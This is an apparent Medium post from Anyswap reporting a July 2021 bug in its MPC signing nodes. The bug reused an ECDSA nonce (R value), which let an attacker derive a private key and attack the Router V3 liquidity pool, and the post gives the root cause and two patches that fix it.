Published in


Anyswap-MPCNode Bug Report

July/15/ 2021

Bug Description

Anyswap-MPCNode distributed signed two transactions with the same R-value. The hacker deduced the private key to this MPC account in reverse and attacked the router V3 liquidity pool. Details:


Anyswap MPC network is based on GG20 Threshold ECDSA signatures. It’s a highly efficient protocol with a non-interactive online phase allowing for Anyswap MPC nodes to asynchronously participate in the protocol without the need to be online simultaneously. The protocol can be split into a preprocessing stage with most of the computation and communication, and an online stage when the message is known, consisting of a single communication round where each MPC node performs a single scalar multiplication. Anyswap MPC nodes preprocess a set of R and other parameters to speed up distributed signatures.

Bug analysis

A customized testnet was built to 100% reproduce this bug. The root cause is a new patch of MPCNode code which router v3 used caused the bug. Anyswap bridge v1/v2 uses the old version, so V1/V2 doesn’t have this problem.

Details: a month ago (same time as the second same R transaction), a new version code of MPC node deployed for Anyswap Router v3, MPC nodes restarted then reloaded the used R from database to memory, the used R data should have been deleted after signed but failed. A new cross-chain transaction sign with used R causes the bug.

This is a very low-probability bug. It requires that MPC nodes fail to delete the same R data from the database, and reload the same R data after all nodes restart.

Bug Solution

Add 2 patches to fix this bug.

1. Revert commit f3cabbe to avoid reloading duplicate R when restarting MPC node.

2. Delete R from DB before signing.

The patches have been tested on the testnet, the duplicate R signatures bug is resolved.

To get involved and stay up to date:

* Join the Anyswap community:

* Follow Anyswap on:

* Subscribe to the Anyswap:

* Send email to Anyswap:



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store